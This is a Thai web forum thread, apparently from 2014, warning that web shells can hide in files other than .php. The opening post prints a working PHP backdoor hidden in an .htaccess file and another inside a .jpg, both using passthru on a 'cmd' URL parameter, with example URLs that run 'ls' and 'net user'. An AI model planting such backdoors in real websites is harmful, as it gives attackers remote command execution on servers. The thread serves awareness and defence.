ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: แฮกเกอร์ยังแฮกเว็บได้ แม้ลบไฟล์ Shell c99  (อ่าน 6830 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
iak1
บุคคลทั่วไป
« เมื่อ: 21 พฤษภาคม 2014, 18:13:28 »

สวัสดีครับ =/\= หลังจากหายกันไปนาน...หลังจากไปซนกันมาพักใหญ่ได้เจออีกเทคนิคหนึ่ง
ที่เป็นการซ่อนโค้ดสำหรับ execute หรือเรียกใช้งานคำสั่งของแต่ละ Os command
ไว้ในไฟล์ .htaccess ซะเลย  หลายๆคนทราบดีอยู่แล้วว่า .htaccess นี้การใช้งานทำได้หลายอย่างมาก
แต่ที่รู้ๆกันอยู่ในไทยนั้นนิยมเขียนไว้เพื่อป้องกันแฮกเกอร์ จากช่องโหว่ต่างๆได้ในระดับหนึ่ง

กลับมาเรื่องของเราดีกว่าครับ...บทความขอเขียนเพื่อเป็นข้อชี้ชัดเจนเรื่องไฟล์ Shell
ว่าไม่ได้มีแค่รูปแบบไฟล์ .php และก็ยังแฝงอยู่ในไฟล์อื่นๆได้อีกด้วยครับ

สำหรับคนที่ยังไม่รู้ว่า Shell คืออะไร ?
(http://basic-hack.blogspot.com/2012/05/shell.html )

ที่หลายๆเว็บที่โดนแฮกและมักจะมีไฟล์หอย เช่น c99.php ขึ้นมาบนเว็บหรืออาจจะเป็นชื่ออื่นๆ
หลายคนก็อาจเข้าใจว่า Shell ต้องเป็น .php ซะเสมอไป ...แต่นั่นเป็นเพียงแค่เปลือก
ที่แฮกเกอร์มือใหม่หลายๆคนอาจนำมาใช้เพื่อความสะดวกแค่นั้นครับ
  
โค้ดนี้ได้พบเจอซ่อนในไฟล์  .htaccess บน www.XXXX.com หนึ่ง

โค๊ด:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET[&#39;cmd&#39;]); ?>

บรรทัดสุดท้ายก็คือการใช้ฟังชั่น passthru เพื่อที่จะ
สามารถทำ Remote Code Execution ได้นั่นเองครับ
และเมื่อ แฮกเกอร์ ต้องการใช้งาน

โค๊ด:
http://www.hacked-by-basic-hack.th/.htaccess?cmd=ls

สำหรับมือใหม่ ตรง ls นี้เราสามารถ Execute  คำสั่งเฉพาะสำหรับแต่ละ OS command ได้
จากตัวอย่าง ls เมื่อผม Enter URL นี้ก็จะหมายถึงการสั่งให้ แสดงแฟ้มข้อมูล ออกมาทางหน้าเว็บเบราเซอร์ของเรา เป็นต้น

จากการค้นคว้าเพิ่มเติม(อันตรายกว่าที่คิด..)

code in pic.jpg
โค๊ด:
<?php
        passthru
($_GET[&#39;cmd&#39;]);
?>

และเมื่อแฮกเกอร์ต้องการใช้งาน
โค๊ด:
http://www.hacked-by-basic-hack.th/pic.jpg?cmd=net user


Secure For You
ak1- http://basic-hack.blogspot.com/2014/05/shell-php.html
« แก้ไขครั้งสุดท้าย: 21 พฤษภาคม 2014, 20:54:19 โดย iak1 » บันทึกการเข้า
thaitanium
สมุนแก๊งเสียว
*

พลังน้ำใจ: 54
ออฟไลน์ ออฟไลน์

กระทู้: 943



ดูรายละเอียด
« ตอบ #1 เมื่อ: 21 พฤษภาคม 2014, 19:51:26 »

 wanwan035 เจาะต่อถึงระดับ root ได้ รึรันอะไรไว้โดยเราไม่รู้ตัว  wanwan035
บันทึกการเข้า
deebedding
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 199
ออฟไลน์ ออฟไลน์

กระทู้: 2,786



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 21 พฤษภาคม 2014, 20:42:34 »

โหดกันจริงๆเลยนะคะ wanwan009
บันทึกการเข้า

w_2005
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 43
ออฟไลน์ ออฟไลน์

กระทู้: 1,486



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 24 กันยายน 2014, 20:26:55 »

โหดจิงๆ
บันทึกการเข้า

Oreo07
สมุนแก๊งเสียว
*

พลังน้ำใจ: 34
ออฟไลน์ ออฟไลน์

กระทู้: 770



ดูรายละเอียด
« ตอบ #4 เมื่อ: 24 กันยายน 2014, 21:01:35 »

ความรู้ทั้งนั้น wanwan020
บันทึกการเข้า

฿ ท่านใดมีสินค้าทำ DropShip แจ้งมาเลยครับ กำลังหาสินค้าขายเพิ่มครับ
฿ หาเพื่อนร่วมทุน project 5 (รอบสุดท้าย) ลงทุนเท่าไหร่ก็ได้เรามีลูกค้าแบ่งกำไร50/50 7 เดือนคืนทุนสนใจpm รับ5ท่าน(ได้ 4แล้วจ้า)★★★★★

ติดต่องานEmail: aeh_nawapron@hotmail.com
deebedding
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 199
ออฟไลน์ ออฟไลน์

กระทู้: 2,786



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 24 กันยายน 2014, 21:21:44 »

ขอบคุณค่ะ
บันทึกการเข้า

หน้า: [1]   ขึ้นบน
พิมพ์